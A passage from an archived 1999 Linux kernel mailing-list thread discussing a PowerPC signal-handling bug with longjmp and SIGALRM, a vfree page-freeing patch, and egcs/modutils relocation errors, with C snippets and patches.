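/* Handler that leaves by jumping instead of returning. */
static void on_alarm(int signo)
{
	(void)signo;
	siglongjmp(timeout_env, 1);
}

/* Returns 1 if SIGALRM is unblocked after jumping out of the handler,
 * 0 if it was left blocked, -1 on error. */
static int alarm_unblocked_after_jump(void)
{
	struct sigaction sa;
	sigset_t now;

	memset(&sa, 0, sizeof(sa));
	sa.sa_handler = on_alarm;
	sigemptyset(&sa.sa_mask);
	if (sigaction(SIGALRM, &sa, NULL) != 0)
		return -1;

	/* savemask = 1: remember the current signal mask in timeout_env. */
	if (sigsetjmp(timeout_env, 1) == 0) {
		raise(SIGALRM);		/* stands in for a timeout firing */
		return -1;		/* only reached if the handler did not jump */
	}

	/* Back from the handler via siglongjmp(); inspect the mask. */
	if (sigprocmask(SIG_SETMASK, NULL, &now) != 0)
		return -1;
	return sigismember(&now, SIGALRM) ? 0 : 1;
}
```

A program that uses plain setjmp()/longjmp() instead depends on whether the C library saves the mask and on the kernel not needing sys_sigreturn to undo the blocking, which is the dependency the report is about.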

The stuff works on intel & it also works if I kludge handle_signal not
to block SIGALRM.

I originally thought fixing longjmp with a syscall would be a good
idea; on conversing with other hackers, it isn't.

I believe the code here can be simplified: drop all the queueing in
handle_signal, remove the while/dequeue loop from do_signal, make
do_signal also work as sys_sigreturn, and unblock the signals just
before sending them. That way I don't think you'll lose any (however,
I haven't fully investigated any possible problems caused by
unblocking signals before sending them). As sys_sigreturn is getting
called for every signal delivered, there is no benefit gained by
queueing them in the first place.

If you aren't maintaining signal.c anymore, could someone forward
this bug report on?

Also could you tell me a good place where I can find some info on the
rt_signal stuff & tell me if a fix gets/already is posted....









^ permalink raw reply	[relevance 59%]

* Re: I believe I found a bug in /arch/ppc/kernel/signal.c
  1999-02-22 14:36 59% I believe I found a bug in /arch/ppc/kernel/signal.c D.J. Barrow
@ 1999-02-22 18:53 64% ` Benjamin Herrenschmidt
  1999-02-23 14:35 64%   ` Lauro Whately
  0 siblings, 1 reply; 200+ results
From: Benjamin Herrenschmidt @ 1999-02-22 18:53 UTC (permalink / raw)
  To: D.J. Barrow, linuxppc-dev


On Mon, Feb 22, 1999, D.J. Barrow <barrow_dj@yahoo.com> wrote:

>The bug manifested itself in tftp, when longjmp'ing out
>of the signal handler on timeouts.
>
>Resulting in....
>a )sys_sigreturn not get called 
>b) signals queued & trampoline stuff on the user stack being trashed.
>c) SIGALRM being blocked forever.

Note also that the people doing ShapeShifter (Mac runtime) said they are
having problems with alternate signal stacks. I didn't look at the code in
much depth; the support looks like it's there, but I haven't tested it. I
don't have more details about their exact problem, but if someone is going
to look at the signal stuff, then please consider testing the alt stack too.

(I think they need this because parts of the MacOS ROM code will use R1 for
something other than the stack, I love Apple ;-)

-- 
           E-Mail: <mailto:bh40@calva.net>
BenH.      Web   : <http://calvaweb.calvacom.fr/bh40/>






^ permalink raw reply	[relevance 64%]

* Re: PATCH - bug in vfree
  1999-02-20 11:46 62% PATCH - bug in vfree Neil Booth
  1999-02-20 12:14 64% ` Neil Booth
@ 1999-02-22 20:31 64% ` Kanoj Sarcar
  1999-02-25  0:47 64% ` Andrea Arcangeli
  2 siblings, 0 replies; 200+ results
From: Kanoj Sarcar @ 1999-02-22 20:31 UTC (permalink / raw)
  To: Neil Booth; +Cc: linux-mm

On Feb 20,  8:46pm, Neil Booth wrote:
> Subject: PATCH - bug in vfree
>

>
> Quick description:- vfree forgets to subtract the extra cushion page
> from the size of each virtual memory area stored in vmlist when it calls
> vmfree_area_pages. This means that only the  vmalloc-requested size is
> allocated by vmalloc_area_pages, but the requested size PLUS the cushion
> page is freed by vmfree_area_pages.
>
> More deeply:- Close inspection of get_vm_area reveals that
> (intentionally?) it does NOT insist there be a cushion page behind a VMA
> that is placed in front of a previously-allocated VMA, it ONLY
> guarantees that a cushion page lies in front of newly-allocated VMAs.
> Thus two VMAs could be immediately adjacent without a cushion page, and
> coupled with the vfree bug means that vfree-ing the first VMA also frees
> the first page of the second VMA, with dire consequences.
>
> I have described this as clearly as I can, I hope it makes sense. Alan,
> this same bug also exists in 2.0.36.
>
> Neil.
>
> [ text/plain ] :
>
> --- linux/mm/vmalloc.c~	Sun Jan 24 19:21:06 1999
> +++ linux/mm/vmalloc.c	Sat Feb 20 20:17:11 1999
> @@ -187,7 +187,7 @@
>  	for (p = &vmlist ; (tmp = *p) ; p = &tmp->next) {
>  		if (tmp->addr == addr) {
>  			*p = tmp->next;
> -			vmfree_area_pages(VMALLOC_VMADDR(tmp->addr), tmp->size);
> +			vmfree_area_pages(VMALLOC_VMADDR(tmp->addr), tmp->size - PAGE_SIZE);
>  			kfree(tmp);
>  			return;
>  		}
>-- End of excerpt from Neil Booth


On Feb 20,  9:14pm, Neil Booth wrote:
> Subject: Re: PATCH - bug in vfree
> Neil Booth wrote:
>
> > More deeply:- Close inspection of get_vm_area reveals that
> > (intentionally?) it does NOT insist there be a cushion page behind a VMA
> > that is placed in front of a previously-allocated VMA, it ONLY
> > guarantees that a cushion page lies in front of newly-allocated VMAs.
>
> Sorry, this is not correct (mistook < for <=). The bug report is
> correct, though.
>
> Neil.


Given that we agree that there is always one page between vm_structs,
the extra page freeing (in vfree) is probably inconsequential, given
that vmfree_area_pages/free_area_pmd/free_area_pte basically ignores
null ptes. But yes, I agree it would be nice to get the "bug" fixed
in vfree().
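
The size bookkeeping being discussed can be modelled in user space. This
is only a sketch under assumptions: the page size is fixed at 4096 bytes,
and struct vm_area_model and the helper functions are invented for
illustration; they are not the kernel's get_vm_area/vfree code. The stored
size includes the cushion page, so the amount handed to the page-freeing
routine should exclude it:

```c
#include <assert.h>

#define MODEL_PAGE_SIZE 4096UL          /* assumed page size */
#define MODEL_PAGE_ALIGN(x) \
    (((x) + MODEL_PAGE_SIZE - 1) & ~(MODEL_PAGE_SIZE - 1))

/* Toy stand-in for an entry on vmlist (hypothetical type). */
struct vm_area_model {
    unsigned long addr;
    unsigned long size;     /* mapped bytes plus one cushion page */
};

/* Records an area the way the thread describes: request + cushion page. */
struct vm_area_model model_get_area(unsigned long addr, unsigned long request)
{
    struct vm_area_model area = {
        addr, MODEL_PAGE_ALIGN(request) + MODEL_PAGE_SIZE
    };
    return area;
}

/* Bytes the unpatched vfree would pass to the page-freeing routine. */
unsigned long bytes_freed_unpatched(const struct vm_area_model *area)
{
    return area->size;
}

/* Bytes passed after the patch: the cushion page was never mapped. */
unsigned long bytes_freed_patched(const struct vm_area_model *area)
{
    assert(area->size >= MODEL_PAGE_SIZE);
    return area->size - MODEL_PAGE_SIZE;
}
```

In this model the unpatched path always covers exactly one page more than
was mapped, which is the mismatch the patch removes.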

Kanoj
--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* RE: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-22 14:36 64% ` egcs-1.1.1-1c bug (was Re: major ksyms problem) Tom Vier
@ 1999-02-23  7:22 64%   ` Gary Thomas
  1999-02-23 12:24 64%     ` Tom Vier
  0 siblings, 1 reply; 200+ results
From: Gary Thomas @ 1999-02-23  7:22 UTC (permalink / raw)
  To: Tom Vier; +Cc: linuxppc-dev, mklinux-setup, mklinux-development-system



On 22-Feb-99 Tom Vier wrote:
> 
> it's an egcs bug. i think it's not aligning instructions properly, cuz
> i believe the 601 is more strict about alignment. is anyone having
> problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
> machine built under pre-R5 (egcs-1.1.1-1c)?
> 
> i rebuilt bsd_comp.o and ppp_deflate.o w/ egcs-1.0-2e from dr3 and
> they worked perfectly.
> 
> egcs-1.1.1-1c failed using -O0, -O2, and -O3 with all combinations of
> -mcpu=601, -mcpu=604, and -fno-schedule-insns. -fpic did work, however
> it adds an offset table symbol that makes insmod complain.
> 
> is this a known problem?
> 
>> > Feb 21 09:36:18 zero insmod: /lib/modules/2.0.37-osfmach3/net/bsd_comp.o:
>> > Unhandled relocation of type 26 for .L343
> 

I think you need newer binutils to fix this.  Try using:
  ftp://ftp.linuxppc.org/linuxppc/users/gdt/redhat/RPMS/ppc/binutils-2.9.1-19a.ppc.rpm


------------------------------------------------------------------------
Gary Thomas                              |
email: gdt@linuxppc.org                  | "Fine wine is a necessity of
   ... opinions expressed here are mine  |        life for me"
       and no one else would claim them! |
                                         |      Thomas Jefferson
------------------------------------------------------------------------




^ permalink raw reply	[relevance 64%]

* RE: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-23  7:22 64%   ` Gary Thomas
@ 1999-02-23 12:24 64%     ` Tom Vier
  1999-02-23 20:53 64%       ` Tom Vier
  0 siblings, 1 reply; 200+ results
From: Tom Vier @ 1999-02-23 12:24 UTC (permalink / raw)
  To: Gary Thomas; +Cc: linuxppc-dev, mklinux-development-system


On Tue, 23 Feb 1999, Gary Thomas wrote:

> On 22-Feb-99 Tom Vier wrote:
> > it's an egcs bug. i think it's not aligning instructions properly, cuz
> > i believe the 601 is more strict about alignment. is anyone having
> > problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
> > machine built under pre-R5 (egcs-1.1.1-1c)?

> > egcs-1.1.1-1c failed using -O0, -O2, and -O3 with all combinations of
> > -mcpu=601, -mcpu=604, and -fno-schedule-insns. -fpic did work, however
> > it adds an offset table symbol that makes insmod complain.
> > 
> > is this a known problem?

> I think you need newer binutils to fix this.  Try using:
>   ftp://ftp.linuxppc.org/linuxppc/users/gdt/redhat/RPMS/ppc/binutils-2.9.1-19a.ppc.rpm

no, it's an egcs bug, i believe. i'm already running
binutils-2.9.1.0.19a-1a from the current pre-R5. i'm downloading those
egcs rpms from your dir, right now, which fred bacon told me have
VTABLE_THUNKS disabled.

--
Tom Vier - 0x82B007A8
thomass@erols.com        | goto the Zero Page at:
Tortured Souls Software  | http://www.erols.com/thomassr/zero/





^ permalink raw reply	[relevance 64%]

* Re: I believe I found a bug in /arch/ppc/kernel/signal.c
  1999-02-22 18:53 64% ` Benjamin Herrenschmidt
@ 1999-02-23 14:35 64%   ` Lauro Whately
  0 siblings, 0 replies; 200+ results
From: Lauro Whately @ 1999-02-23 14:35 UTC (permalink / raw)
  To: D.J. Barrow; +Cc: linuxppc-dev


> On Mon, Feb 22, 1999, D.J. Barrow <barrow_dj@yahoo.com> wrote:

> The bug manifested itself in tftp, when longjmp'ing out
> of the signal handler on timeouts.
>
> Resulting in....
> a )sys_sigreturn not get called
> b) signals queued & trampoline stuff on the user stack being trashed.
> c) SIGALRM being blocked forever.

Have you tried sigsetjmp/siglongjmp?
I ran into a similar problem a month ago and found that POSIX.1 does not
specify the effect of setjmp and longjmp on signal masks (SVR4 does not save
and restore the signal mask under setjmp/longjmp, whereas 4.3 BSD saves and
restores it). Instead, POSIX.1 defines two new functions, sigsetjmp and
siglongjmp.
Those new ones are working ok with linux 2.1.x releases (I've been using them
with linuxppc 2.1.112).
It seems that the behavior of sigsetjmp/siglongjmp was changed to the POSIX.1
specification around the release 2.1.112.
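
A minimal sketch of the sigsetjmp/siglongjmp pattern, assuming a POSIX
system. The names timeout_env, on_alarm, sigalrm_blocked and
wait_with_timeout are made up for illustration; this is not the tftp code.
Because sigsetjmp is called with a non-zero savemask, siglongjmp restores
the signal mask, so SIGALRM should not stay blocked after the jump:

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <assert.h>
#include <setjmp.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>

static sigjmp_buf timeout_env;          /* hypothetical name */

/* SIGALRM handler: leave via siglongjmp instead of returning. */
static void on_alarm(int signo)
{
    (void)signo;
    siglongjmp(timeout_env, 1);
}

/* Returns 1 if SIGALRM is blocked in the caller, 0 if not, -1 on error. */
int sigalrm_blocked(void)
{
    sigset_t cur;

    if (sigprocmask(SIG_BLOCK, NULL, &cur) != 0)
        return -1;
    return sigismember(&cur, SIGALRM);
}

/*
 * Arms a timeout, waits for it, and escapes the handler with siglongjmp.
 * Returns sigalrm_blocked() as observed after the jump.
 */
int wait_with_timeout(unsigned int seconds)
{
    struct sigaction sa;

    assert(seconds > 0);                /* alarm(0) would cancel the timer */

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_alarm;
    sigemptyset(&sa.sa_mask);
    if (sigaction(SIGALRM, &sa, NULL) != 0)
        return -1;

    if (sigsetjmp(timeout_env, 1) == 0) {   /* 1 = save the signal mask */
        alarm(seconds);
        for (;;)
            pause();                        /* wait for SIGALRM */
    }
    /* Reached only through siglongjmp from the handler. */
    return sigalrm_blocked();
}
```

Calling wait_with_timeout() twice in a row is a simple check: if the mask
were not restored, the second call would never see its SIGALRM.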

--
 Lauro Whately
 Parallel Computing Lab. / COPPE
 Federal University of Rio de Janeiro
 Brazil
 =====================================
 "A distributed system is one on which I cannot get any work done, because a
 machine I have never heard of has crashed." -- Leslie Lamport





^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
       [not found]     ` <Pine.LNX.4.05.9902220928100.405-100000@localhost.erols.com >
@ 1999-02-23 15:00 64%   ` Franz Sirl
  1999-02-23 21:06 64%     ` Tom Vier
  0 siblings, 1 reply; 200+ results
From: Franz Sirl @ 1999-02-23 15:00 UTC (permalink / raw)
  To: Tom Vier
  Cc: Tom Vier, mklinux-development-system, mklinux-setup, linuxppc-dev


At 15:36 22.02.99 , Tom Vier wrote:
>
>it's an egcs bug. i think it's not aligning instructions properly, cuz
>i believe the 601 is more strict about alignment. is anyone having
>problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
>machine built under pre-R5 (egcs-1.1.1-1c)?

What makes you think that it is an egcs bug? I have no problems on 601
(7200/75) with any of the modules you listed. Are you sure you have the
latest modutils (2.1.121 or later) installed?

>i rebuilt bsd_comp.o and ppp_deflate.o w/ egcs-1.0-2e from dr3 and
>they worked perfectly.
>
>egcs-1.1.1-1c failed using -O0, -O2, and -O3 with all combinations of
>-mcpu=601, -mcpu=604, and -fno-schedule-insns. -fpic did work, however
>it adds an offset table symbol that makes insmod complain.
>
>is this a known problem?
>
>> > Feb 21 09:36:18 zero insmod: /lib/modules/2.0.37-osfmach3/net/bsd_comp.o:
>> > Unhandled relocation of type 26 for .L343

Is "Unhandled relocation of type 26" the behaviour for standard compilation
or for -fpic? You can't compile a kernel/modules with -fpic and expect
modutils still to work, modutils only handles the minimum necessary
relocation types.

Franz.



^ permalink raw reply	[relevance 64%]

* RE: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-23 12:24 64%     ` Tom Vier
@ 1999-02-23 20:53 64%       ` Tom Vier
  0 siblings, 0 replies; 200+ results
From: Tom Vier @ 1999-02-23 20:53 UTC (permalink / raw)
  To: Tom Vier; +Cc: Gary Thomas, linuxppc-dev, mklinux-development-system


On Tue, 23 Feb 1999, Tom Vier wrote:

> > I think you need newer binutils to fix this.  Try using:
> >   ftp://ftp.linuxppc.org/linuxppc/users/gdt/redhat/RPMS/ppc/binutils-2.9.1-19a.ppc.rpm
> 
> no, it's an egcs bug, i believe. i'm already running
> binutils-2.9.1.0.19a-1a from the current pre-R5. i'm downloading those
> egcs rpms from your dir, right now, which fred bacon told me have
> VTABLE_THUNKS disabled.

nevermind, i just heard VTABLE_THUNKS is c++ stuff. i'm trying the
latest pre-pre-R5 egcs ;)

--
Tom Vier - 0x82B007A8
thomass@erols.com        | goto the Zero Page at:
Tortured Souls Software  | http://www.erols.com/thomassr/zero/



^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-23 15:00 64%   ` Franz Sirl
@ 1999-02-23 21:06 64%     ` Tom Vier
  1999-02-23 21:15 64%       ` Franz Sirl
  1999-02-24  7:14 64%       ` Michel Lanners
  0 siblings, 2 replies; 200+ results
From: Tom Vier @ 1999-02-23 21:06 UTC (permalink / raw)
  To: Franz Sirl; +Cc: Tom Vier, mklinux-development-system, linuxppc-dev


On Tue, 23 Feb 1999, Franz Sirl wrote:

> At 15:36 22.02.99 , Tom Vier wrote:
> >
> >it's an egcs bug. i think it's not aligning instructions properly, cuz
> >i believe the 601 is more strict about alignment. is anyone having
> >problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
> >machine built under pre-R5 (egcs-1.1.1-1c)?
> 
> What makes you think that it is an egcs bug? I have no problems on 601
> (7200/75) with any of the modules you listed. Are you sure you have the
> latest modutils (2.1.121 or later) installed?

it is an egcs bug. egcs-1.1.1-1c fails to build working bsd_comp.o,
ppp_deflate.o, and hfs.o; egcs-1.0-2e.ppc.rpm builds them perfectly. i'm
getting a newer build of egcs right now, to see if it's fixed.

> >i rebuilt bsd_comp.o and ppp_deflate.o w/ egcs-1.0-2e from dr3 and
> >they worked perfectly.
> >
> >egcs-1.1.1-1c failed using -O0, -O2, and -O3 with all combinations of
> >-mcpu=601, -mcpu=604, and -fno-schedule-insns. -fpic did work, however
> >it adds an offset table symbol that makes insmod complain.
> >> > Feb 21 09:36:18 zero insmod: /lib/modules/2.0.37-osfmach3/net/bsd_comp.o:
> >> > Unhandled relocation of type 26 for .L343
> 
> Is "Unhandled relocation of type 26" the behaviour for standard compilation
> or for -fpic? You can't compile a kernel/modules with -fpic and expect
> modutils still to work, modutils only handles the minimum necessary
> relocation types.

the unhandled relocation was from egcs-1.1.1-1c using the standard
flags (no -fpic). i didn't expect it to work w/ -fpic, but i thought it
might work better and it appears to, since it stopped insmod from
complaining about relocations and made it complain about the symbol
offset table instead (though it may just complain about the offset table
before finding the relocation problem, thus -fpic might not actually
make a difference).

--
Tom Vier - 0x82B007A8
thomass@erols.com        | goto the Zero Page at:
Tortured Souls Software  | http://www.erols.com/thomassr/zero/



^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-23 21:06 64%     ` Tom Vier
@ 1999-02-23 21:15 64%       ` Franz Sirl
  1999-02-24  9:53 64%         ` Gary Thomas
  1999-02-24 18:40 64%         ` Tom Vier
  1999-02-24  7:14 64%       ` Michel Lanners
  1 sibling, 2 replies; 200+ results
From: Franz Sirl @ 1999-02-23 21:15 UTC (permalink / raw)
  To: Tom Vier, Tom Vier, Franz Sirl; +Cc: mklinux-development-system, linuxppc-dev


Am Tue, 23 Feb 1999 schrieb Tom Vier:
>On Tue, 23 Feb 1999, Franz Sirl wrote:
>
>> At 15:36 22.02.99 , Tom Vier wrote:
>> >
>> >it's an egcs bug. i think it's not aligning instructions properly, cuz
>> >i believe the 601 is more strict about alignment. is anyone having
>> >problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
>> >machine built under pre-R5 (egcs-1.1.1-1c)?
>> 
>> What makes you think that it is an egcs bug? I have no problems on 601
>> (7200/75) with any of the modules you listed. Are you sure you have the
>> latest modutils (2.1.121 or later) installed?
>
>it is an egcs bug. egcs-1.1.1-1c fails to build working bsd_comp.o,
>ppp_deflate.o, and hfs.o; egcs-1.0-2e.ppc.rpm builds it perfectly. i'm
>getting a newer build of egcs right now, to see if it's fixed.

What is the problem with these modules? Can you give a better description of
what you mean by "working"? They work perfectly for me with a self-compiled
2.2.1 kernel, and I have compiled working modules with multiple kernel
versions since the egcs-1.1 alpha phase.
If your only problem is the "unhandled relocation type", install a newer
modutils package (>=2.1.121), that will fix it.

Franz.



^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-23 21:06 64%     ` Tom Vier
  1999-02-23 21:15 64%       ` Franz Sirl
@ 1999-02-24  7:14 64%       ` Michel Lanners
  1 sibling, 0 replies; 200+ results
From: Michel Lanners @ 1999-02-24  7:14 UTC (permalink / raw)
  To: thomassr; +Cc: nester, Franz.Sirl, mklinux-development-system, linuxppc-dev


On  23 Feb, this message from Tom Vier echoed through cyberspace:
[snip]
>> >egcs-1.1.1-1c failed using -O0, -O2, and -O3 with all combinations of
>> >-mcpu=601, -mcpu=604, and -fno-schedule-insns. -fpic did work, however
>> >it adds an offset table symbol that makes insmod complain.
>> >> > Feb 21 09:36:18 zero insmod: /lib/modules/2.0.37-osfmach3/net/bsd_comp.o:
>> >> > Unhandled relocation of type 26 for .L343
>> 
>> Is "Unhandled relocation of type 26" the behaviour for standard compilation
>> or for -fpic? You can't compile a kernel/modules with -fpic and expect
>> modutils still to work, modutils only handles the minimum necessary
>> relocation types.

Just to make sure we all talk about the same things, there was an issue
with relocation of kernel modules some time ago when we moved to a
newer version of egcs, which needed a newer version of modutils to be
able to handle that new relocation.

The modutils version to use is 2.1.121. If nowhere else, you can find a
binary on my site (see below).

Now, I may be completely off track, and this problem now is something
completely different ;-)

Michel

-------------------------------------------------------------------------
Michel Lanners                 |  " Read Philosophy.  Study Art.
23, Rue Paul Henkes            |    Ask Questions.  Make Mistakes.
L-1710 Luxembourg              |
email   mlan@cpu.lu            |
http://www.cpu.lu/~mlan        |                     Learn Always. "



^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-23 21:15 64%       ` Franz Sirl
@ 1999-02-24  9:53 64%         ` Gary Thomas
  1999-02-24 16:06 64%           ` Franz Sirl
  1999-02-25  2:20 64%           ` Tom Vier
  1999-02-24 18:40 64%         ` Tom Vier
  1 sibling, 2 replies; 200+ results
From: Gary Thomas @ 1999-02-24  9:53 UTC (permalink / raw)
  To: Franz Sirl
  Cc: linuxppc-dev, linuxppc-dev, mklinux-development-system,
	Franz Sirl, Tom Vier, Tom Vier



On 23-Feb-99 Franz Sirl wrote:
> 
> Am Tue, 23 Feb 1999 schrieb Tom Vier:
>>On Tue, 23 Feb 1999, Franz Sirl wrote:
>>
>>> At 15:36 22.02.99 , Tom Vier wrote:
>>> >
>>> >it's an egcs bug. i think it's not aligning instructions properly, cuz
>>> >i believe the 601 is more strict about alignment. is anyone having
>>> >problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
>>> >machine built under pre-R5 (egcs-1.1.1-1c)?
>>> 
>>> What makes you think that it is an egcs bug? I have no problems on 601
>>> (7200/75) with any of the modules you listed. Are you sure you have the
>>> latest modutils (2.1.121 or later) installed?
>>
>>it is an egcs bug. egcs-1.1.1-1c fails to build working bsd_comp.o,
>>ppp_deflate.o, and hfs.o; egcs-1.0-2e.ppc.rpm builds it perfectly. i'm
>>getting a newer build of egcs right now, to see if it's fixed.
> 
> What is the problem with these modules? Give a better description on what you
> mean with "working"? They work perfectly for me with a self-compiled 2.2.1
> kernel, and I compiled working modules with multiple kernel versions since the
> egcs-1.1 alpha phase.
> If your only problem is the "unhandled relocation type", install a newer
> modutils package (>=2.1.121), that will fix it.
> 

Sadly he can't use that modutils package as it's only for 2.1.xx and 2.2.xx
kernels.

Tom,  Can you try the 2.2.xx kernels and see if they work for you?  This would
be a much better way to spend your time rather than looking after a quite old
kernel.

------------------------------------------------------------------------
Gary Thomas                              |
email: gdt@linuxppc.org                  | "Fine wine is a necessity of
   ... opinions expressed here are mine  |        life for me"
       and no one else would claim them! |
                                         |      Thomas Jefferson
------------------------------------------------------------------------




^ permalink raw reply	[relevance 64%]

* Re: I believe I found a bug in /arch/ppc/kernel/signal.c
@ 1999-02-24 12:45 64% D.J. Barrow
  0 siblings, 0 replies; 200+ results
From: D.J. Barrow @ 1999-02-24 12:45 UTC (permalink / raw)
  To: Lauro Whately; +Cc: linuxppc-dev


Thanks Lauro,

setjmp in glibc2 compiles to sigsetjmp(env,0), i.e. it doesn't save the
signal mask.

sigsetjmp gets rid of the signal-being-blocked issue (the main
symptom), but outstanding signals on the user stack can still
be trashed.
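
To illustrate the point about sigsetjmp(env,0), here is a small sketch,
assuming POSIX signal semantics, in which the handler jumps out and the
mask is inspected afterwards. The helper names are hypothetical. With
savemask 0 the mask in effect inside the handler (SIGALRM blocked) is left
in place after the jump; with savemask 1 it is restored. This only covers
the blocked-signal symptom, not the trashed user stack:

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <assert.h>
#include <setjmp.h>
#include <signal.h>
#include <string.h>

static sigjmp_buf jump_env;             /* hypothetical name */

static void jump_out(int signo)
{
    (void)signo;
    siglongjmp(jump_env, 1);            /* the handler never returns normally */
}

/* Unblocks SIGALRM in the caller; returns 0 on success. */
int unblock_sigalrm(void)
{
    sigset_t set;

    sigemptyset(&set);
    sigaddset(&set, SIGALRM);
    return sigprocmask(SIG_UNBLOCK, &set, NULL);
}

/*
 * Raises SIGALRM, jumps out of its handler, and reports whether SIGALRM
 * is blocked afterwards (1 = blocked, 0 = not blocked, -1 = error).
 */
int blocked_after_jump(int savemask)
{
    struct sigaction sa;
    sigset_t cur;

    assert(savemask == 0 || savemask == 1);  /* only these cases are shown */

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = jump_out;
    sigemptyset(&sa.sa_mask);           /* no SA_NODEFER: SIGALRM is blocked in the handler */
    if (sigaction(SIGALRM, &sa, NULL) != 0 || unblock_sigalrm() != 0)
        return -1;

    if (sigsetjmp(jump_env, savemask) == 0) {
        raise(SIGALRM);                 /* handler runs before raise() returns */
        return -1;                      /* not reached if the handler ran */
    }
    if (sigprocmask(SIG_BLOCK, NULL, &cur) != 0)
        return -1;
    return sigismember(&cur, SIGALRM);
}
```

After a savemask 0 jump, unblock_sigalrm() is the manual equivalent of what
the saved mask would have restored.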




---Lauro Whately <whately@cos.ufrj.br> wrote:
>
> > On Mon, Feb 22, 1999, D.J. Barrow <barrow_dj@yahoo.com> wrote:
> 
> > The bug manifested itself in tftp, when longjmp'ing out
> > of the signal handler on timeouts.
> >
> > Resulting in....
> > a )sys_sigreturn not get called
> > b) signals queued & trampoline stuff on the user stack being trashed.
> > c) SIGALRM being blocked forever.
> 
> Have you tried the sigsetjmp/siglongjmp ?
> I've met a similar problem a month ago and found that POSIX.1 does not
> specify the effect of setjmp and longjmp on signal masks (SVR4 does not save
> and restore the signal mask under  setjmp/longjmp, however 4.3 BSD save and
> restore the signal mask) Instead, two new functions sigsetjmp and siglongjmp
> are defined by POSIX.1
> Those new ones are working ok with linux 2.1.x releases (I've been using them
> with linuxppc 2.1.112)
> It seems that the behavior of sigsetjmp/siglongjmp was changed to the POSIX.1
> specification around the release 2.1.112.
> 
> --
>  Lauro Whately
>  Parallel Computing Lab. / COPPE
>  Federal University of Rio de Janeiro
>  Brazil
>  =====================================
>  "A distributed system is one on which I cannot get any work done, because a
>  machine I have never heard of has crashed." -- Leslie Lamport
> 
> 
> 
> 




^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-24  9:53 64%         ` Gary Thomas
@ 1999-02-24 16:06 64%           ` Franz Sirl
  1999-02-25  2:20 64%           ` Tom Vier
  1 sibling, 0 replies; 200+ results
From: Franz Sirl @ 1999-02-24 16:06 UTC (permalink / raw)
  To: Gary Thomas, Tom Vier; +Cc: linuxppc-dev


At 10:53 24.02.99 , Gary Thomas wrote:

>On 23-Feb-99 Franz Sirl wrote:
>>
>> Am Tue, 23 Feb 1999 schrieb Tom Vier:
>>>On Tue, 23 Feb 1999, Franz Sirl wrote:
>>>
>>>> At 15:36 22.02.99 , Tom Vier wrote:
>>>> >
>>>> >it's an egcs bug. i think it's not aligning instructions properly, cuz
>>>> >i believe the 601 is more strict about alignment. is anyone having
>>>> >problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
>>>> >machine built under pre-R5 (egcs-1.1.1-1c)?
>>>>
>>>> What makes you think that it is an egcs bug? I have no problems on 601
>>>> (7200/75) with any of the modules you listed. Are you sure you have the
>>>> latest modutils (2.1.121 or later) installed?
>>>
>>>it is an egcs bug. egcs-1.1.1-1c fails to build working bsd_comp.o,
>>>ppp_deflate.o, and hfs.o; egcs-1.0-2e.ppc.rpm builds it perfectly. i'm
>>>getting a newer build of egcs right now, to see if it's fixed.
>>
>> What is the problem with these modules? Give a better description on what you
>> mean with "working"? They work perfectly for me with a self-compiled 2.2.1
>> kernel, and I compiled working modules with multiple kernel versions since the
>> egcs-1.1 alpha phase.
>> If your only problem is the "unhandled relocation type", install a newer
>> modutils package (>=2.1.121), that will fix it.
>>
>
>Sadly he can't use that modutils package as it's only for 2.1.xx and 2.2.xx
>kernels.
>
>Tom,  Can you try the 2.2.xx kernels and see if they work for you?  This would
>be a much better way to spend your time rather than looking after a quite old
>kernel.

Or try to recompile the modutils (or modules package, as it was called 
before) he is using with the appended patch.

Franz.

Index: obj_ppc.c
===================================================================
RCS file: /cvsroot/modutils/obj/obj_ppc.c,v
retrieving revision 1.1
diff -u -r1.1 obj_ppc.c
--- obj_ppc.c   1997/09/10 22:20:03     1.1
+++ obj_ppc.c   1998/06/24 01:47:42
@@ -148,6 +148,11 @@
       *loc = (*loc & ~0x03fffffc) | (v & 0x03fffffc);
       break;

+    case R_PPC_REL32:
+      v -= dot;
+      *loc = v;
+      break;
+
     case R_PPC_ADDR32:
       *loc = v;
       break;
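
For reference, the arithmetic the new case performs, written as a
standalone sketch. R_PPC_REL32 is relocation type 26 in the PowerPC ELF
ABI, which matches the "Unhandled relocation of type 26" message earlier
in the thread. The function names below are hypothetical; v stands for the
symbol value plus addend and dot for the address of the word being
patched, as in the patch:

```c
#include <assert.h>
#include <stdint.h>

/* R_PPC_ADDR32: store the absolute value (symbol + addend). */
uint32_t apply_addr32(uint32_t v)
{
    return v;
}

/* R_PPC_REL32: store the value relative to the patched location. */
uint32_t apply_rel32(uint32_t v, uint32_t dot)
{
    /* Unsigned wrap-around yields a 32-bit two's-complement offset. */
    return v - dot;
}

/* Writes a REL32 result into the word at loc (illustrative helper). */
void patch_rel32(uint32_t *loc, uint32_t v, uint32_t dot)
{
    assert(loc != 0);
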